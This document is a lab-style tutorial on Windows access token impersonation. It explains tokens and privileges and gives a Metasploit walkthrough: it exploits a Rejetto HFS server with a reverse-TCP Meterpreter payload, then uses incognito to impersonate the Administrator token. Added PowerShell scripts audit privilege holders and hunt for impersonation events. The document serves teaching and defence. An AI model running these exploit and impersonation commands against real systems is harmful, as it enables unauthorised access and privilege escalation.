🔥Access Token Impersonation

Windows Access Tokens

  • Windows access tokens are a core element of the authentication process on Windows and are created and managed by the Local Security Authority Subsystem Service (LSASS).

  • A Windows access token is responsible for identifying and describing the security context of a process or thread running on a system. Simply put, an access token can be thought of as a temporary key akin to a web cookie that provides users with access to a system or network resource without having to provide credentials each time a process is started or a system resource is accessed.

  • Access tokens are generated by the winlogon.exe process every time a user authenticates successfully and include the identity and privileges of the user account associated with the thread or process. This token is then attached to the userinit.exe process, after which all child processes started by the user inherit a copy of the access token from their creator and run under the privileges of that same token.

  • Windows access tokens are categorized based on the varying security levels assigned to them. These security levels are used to determine the privileges that are assigned to a specific token.

  • An access token will typically be assigned one of the following security levels:

    • Impersonate-level tokens are created as a direct result of a non-interactive login on Windows, typically through specific system services or domain logons.

    • Delegate-level tokens are typically created through an interactive login on Windows, primarily through a traditional login or through remote access protocols such as RDP.

  • Impersonate-level tokens can only be used to impersonate the user on the local system; they cannot be used against external systems that would otherwise accept the token.

  • Delegate-level tokens pose the largest threat because they can be used to impersonate the user on any system, local or remote.
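The impersonation levels described above can be read directly from a token with the .NET WindowsIdentity class. The following is an added example, not code from the original page: it summarises the token of the current PowerShell process, maps the .NET TokenImpersonationLevel values onto the two categories above, and flags whether the process runs under one of the service accounts that typically host network-facing software. It needs no extra modules or administrator rights; the account names matched in IsServiceAccount are an assumption for English-language Windows.

```powershell
# Added example (not from the original page): summarise the access token of the
# current PowerShell process using the .NET WindowsIdentity / WindowsPrincipal classes.
function Get-TokenSummary {
    $identity  = [System.Security.Principal.WindowsIdentity]::GetCurrent()
    $principal = [System.Security.Principal.WindowsPrincipal]$identity
    $adminRole = [System.Security.Principal.WindowsBuiltInRole]::Administrator

    # TokenImpersonationLevel maps onto the two levels discussed above:
    #   Impersonation -> "impersonate-level" (usable on this host only)
    #   Delegation    -> "delegate-level"    (usable against remote systems too)
    # Anonymous and Identification carry no right to act as the user at all, and
    # a process's own primary token reports 'None' here.
    $level = $identity.ImpersonationLevel

    [pscustomobject]@{
        User               = $identity.Name
        AuthenticationType = $identity.AuthenticationType
        ImpersonationLevel = $level.ToString()
        IsDelegateLevel    = ($level -eq [System.Security.Principal.TokenImpersonationLevel]::Delegation)
        IsLocalAdmin       = $principal.IsInRole($adminRole)
        GroupCount         = $identity.Groups.Count
        # Assumed English account names: LOCAL SERVICE / NETWORK SERVICE / SYSTEM are
        # the usual holders of SeImpersonatePrivilege, so a network-facing process
        # running in one of these contexts is worth noting during a review.
        IsServiceAccount   = ($identity.Name -match '^NT AUTHORITY\\(LOCAL SERVICE|NETWORK SERVICE|SYSTEM)$')
    }
}

Get-TokenSummary | Format-List
```

Run it interactively and the level shows as None (a primary token); run the same function from inside a thread that is impersonating a client, for example inside a service handling a request, and the Impersonation or Delegation value is what the token's owner granted when the connection was authenticated.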

Windows Privileges

  • The process of impersonating access tokens to elevate privileges on a system depends primarily on the privileges assigned to the account that was exploited to gain initial access, as well as on the impersonation or delegation tokens available.

  • The following are the privileges that are required for a successful impersonation attack:

    • SeAssignPrimaryToken: This allows a user to impersonate tokens.

    • SeCreateToken: This allows a user to create an arbitrary token with administrative privileges.

    • SeImpersonatePrivilege: This allows a user to create a process under the security context of another user, typically with administrative privileges.
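A defender's first question for the three privileges above is which accounts actually hold them on a given host and which exposed services run under those accounts. The script below is an added example, not code from the original page: it exports the local security policy with secedit, lists the holders of the three privileges, and cross-references them with the account of every listening TCP process. It requires an elevated session (both the secedit export and Get-Process -IncludeUserName need administrator rights), assumes the English privilege names secedit writes, and does not expand group membership, so a process running as a member of Administrators is not matched unless the account itself is listed.

```powershell
# Added example (not from the original page): audit holders of the impersonation
# privileges and the accounts of network-listening processes. Run elevated.
$WatchedPrivileges = 'SeImpersonatePrivilege', 'SeAssignPrimaryTokenPrivilege', 'SeCreateTokenPrivilege'

function Get-PrivilegeHolders {
    $cfg = Join-Path $env:TEMP 'secpol-export.inf'
    # The [Privilege Rights] section of the export lists each privilege with the
    # SIDs (prefixed '*') or account names granted to it.
    secedit /export /cfg $cfg /areas USER_RIGHTS | Out-Null
    try {
        $lines = Get-Content $cfg
    } finally {
        Remove-Item $cfg -ErrorAction SilentlyContinue
    }
    foreach ($line in $lines) {
        if ($line -match '^(Se\w+)\s*=\s*(.*)$' -and $WatchedPrivileges -contains $matches[1]) {
            $priv = $matches[1]
            foreach ($entry in ($matches[2] -split ',')) {
                $entry = $entry.Trim()
                if (-not $entry) { continue }
                $name = $entry
                if ($entry.StartsWith('*')) {
                    # Resolve the SID to an account name; keep the raw SID if it cannot be translated.
                    try {
                        $sid  = New-Object System.Security.Principal.SecurityIdentifier($entry.Substring(1))
                        $name = $sid.Translate([System.Security.Principal.NTAccount]).Value
                    } catch { $name = $entry.Substring(1) }
                }
                [pscustomobject]@{ Privilege = $priv; Holder = $name }
            }
        }
    }
}

function Get-ListeningProcessAccounts {
    # Map each listening TCP port to its owning process and the account it runs as.
    $listeners = Get-NetTCPConnection -State Listen | Select-Object -Unique LocalPort, OwningProcess
    foreach ($l in $listeners) {
        $p = Get-Process -Id $l.OwningProcess -IncludeUserName -ErrorAction SilentlyContinue
        if ($p) {
            [pscustomobject]@{ Port = $l.LocalPort; Process = $p.ProcessName; Account = $p.UserName }
        }
    }
}

$holders = Get-PrivilegeHolders
$holders | Sort-Object Privilege, Holder | Format-Table -AutoSize

# Listening processes whose account directly holds one of the watched privileges.
$holderNames = $holders.Holder | Sort-Object -Unique
Get-ListeningProcessAccounts |
    Where-Object { $holderNames -contains $_.Account } |
    Sort-Object Port | Format-Table -AutoSize
```

On a stock Windows install SeImpersonatePrivilege is granted to Administrators, SERVICE, LOCAL SERVICE and NETWORK SERVICE, SeAssignPrimaryTokenPrivilege to LOCAL SERVICE and NETWORK SERVICE, and SeCreateTokenPrivilege to nobody; any additional holder, or any internet-facing service appearing in the second table, is the finding to follow up (for example by moving the service to a virtual service account or a dedicated low-privilege user without the privilege).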

The Incognito Meterpreter Module

  • The Incognito Meterpreter module is built into Metasploit; it was originally developed as a standalone application for token impersonation after a successful exploit.

  • The Incognito module allows you to display a list of available user tokens that can be impersonated.

  • It enables token impersonation, allowing you to assume different user identities and access elevated privileges on the compromised system.

  • This module enhances post-exploitation capabilities, enabling deeper system access and facilitating the assessment of security risks by adopting various user tokens.

Attack Flow for the Access Token Impersonation Attack

1. Exploit Vulnerability

  • Target: HTTP Rejetto web server

  • Vulnerability: Remote Code Execution (RCE)

  • Tool: Metasploit Framework

  • Module: exploit/windows/http/rejetto_hfs_exec

  • Action: Use the msfconsole to launch the exploit and gain basic access to the server.

  • Command:

    use exploit/windows/http/rejetto_hfs_exec
    set RHOSTS [Target IP]
    set PAYLOAD windows/meterpreter/reverse_tcp
    set LHOST [Your IP]
    exploit

2. Check System Information

  • Action: Once you have a Meterpreter session, run the sysinfo command to gather system details.

  • Command:

    sysinfo

  • Observation: Confirm the system is 32-bit (x86) based on the output.

  • Issue: You may encounter “Access is denied” if trying to migrate to a 64-bit shell because the current session is 32-bit.

  • Solution: Use the incognito module to bypass this restriction instead.

4. Check Privileges

  • Action: Execute the getuid command to check the current user.

  • Command:

    getuid

  • Output: Shows "LOCAL SERVICE" as the current user.

  • Next Step: Run getprivs to list available privileges.

  • Command:

    getprivs

5. Leverage Privileges for Token Impersonation

  • Privilege: SeImpersonatePrivilege is available, allowing token impersonation.

  • Action: Load the incognito module to use this privilege.

  • Command:

    load incognito

6. List Available Tokens

  • Action: Display user tokens to find a higher privilege token.

  • Command:

    list_tokens -u

7. Impersonate a Higher Privilege User

  • Action: Use the impersonate_token command to assume the identity of a higher privilege user.

  • Command:

    impersonate_token "ATTACKDEFENSE\Administrator"

8. Migrate to a 64-bit Shell

  • Action: After impersonation, migrate to a 64-bit (x64) shell.

  • Command:

    migrate [x64 Process ID]
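From the defender's side, the observable trace of the flow above is a process that runs under a different account than the one that created it, which is what happens when a shell is started under the impersonated token. The script below is an added example, not code from the original page: it reads Security event 4688 (process creation) and reports every event whose Target Subject differs from the creating Subject, marking the LOCAL SERVICE to Administrator pattern of this walkthrough as high risk. It assumes "Audit Process Creation" is enabled, an elevated session, and a Windows 10 / Server 2016 or later build whose 4688 events carry the Target Subject fields; the default service-account list is an assumption for English-language Windows.

```powershell
# Added example (not from the original page): hunt Security 4688 events for process
# creations whose token belongs to a different account than the creator.
function Find-TokenMismatchProcessCreations {
    param(
        [int]$Hours = 24,
        # Assumed English account names; SYSTEM is left out because winlogon and the
        # task scheduler legitimately start user processes from a SYSTEM context.
        [string[]]$ServiceAccounts = @('LOCAL SERVICE', 'NETWORK SERVICE')
    )
    $filter = @{ LogName = 'Security'; Id = 4688; StartTime = (Get-Date).AddHours(-$Hours) }
    foreach ($evt in Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue) {
        # Pull the EventData fields by name rather than by position.
        $data = @{}
        ([xml]$evt.ToXml()).Event.EventData.Data | ForEach-Object { $data[$_.Name] = $_.'#text' }

        # Target Subject is '-' when the new process simply inherited its creator's
        # token; a populated, different account means the token was switched.
        $creator = $data['SubjectUserName']
        $target  = $data['TargetUserName']
        if ($target -and $target -ne '-' -and $target -ne $creator) {
            [pscustomobject]@{
                Time       = $evt.TimeCreated
                Creator    = "$($data['SubjectDomainName'])\$creator"
                RunsAs     = "$($data['TargetDomainName'])\$target"
                NewProcess = $data['NewProcessName']
                Parent     = $data['ParentProcessName']
                # A service account spawning a process as another user is the pattern
                # from the walkthrough above (LOCAL SERVICE -> Administrator).
                HighRisk   = ($ServiceAccounts -contains $creator)
            }
        }
    }
}

Find-TokenMismatchProcessCreations -Hours 48 | Sort-Object Time | Format-Table -AutoSize
```

Expect some benign mismatches (IIS worker processes, RDP session setup, scheduled tasks); the HighRisk column narrows the list to creators that are service accounts, which is exactly the context the exploited HTTP server above was running in, so the first thing to check for each hit is the parent process and whether that service should ever be starting programs as an administrator.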



Hacker's Mantra: Computer hackers do not need to know each other’s real names, or even live on the same continent, to steal millions in mere hours. - Robert Mueller
